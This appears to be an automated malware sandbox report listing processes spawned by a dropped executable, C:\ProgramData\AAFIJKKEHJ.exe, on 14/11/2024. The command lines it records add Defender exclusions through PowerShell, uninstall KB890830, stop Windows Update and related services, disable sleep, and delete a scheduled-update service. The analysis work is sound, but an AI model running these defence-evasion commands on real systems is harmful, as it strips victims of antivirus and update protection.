                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:15
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6920 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:19
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:21
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:57
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\ProgramData\AAFIJKKEHJ.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\ProgramData\AAFIJKKEHJ.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ad6d0000
                                                                                                                                                                                                                                                                                                                                                        File size:11'695'088 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:FBBA09E1B1024A3E7B88D06B53AD3716
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                                                                                                                                        • Detection: 4%, ReversingLabs
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:58
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7be880000
                                                                                                                                                                                                                                                                                                                                                        File size:452'608 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:58
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:01
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6ef0c0000
                                                                                                                                                                                                                                                                                                                                                        File size:496'640 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7c5350000
                                                                                                                                                                                                                                                                                                                                                        File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\wusa.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6b2870000
                                                                                                                                                                                                                                                                                                                                                        File size:345'088 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:31
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:32
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:42
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff64de00000
                                                                                                                                                                                                                                                                                                                                                        File size:96'256 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:43
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:44
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:45
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineK"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff70bb40000
                                                                                                                                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:46
                                                                                                                                                                                                                                                                                                                                                        Start time:09:27:02
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
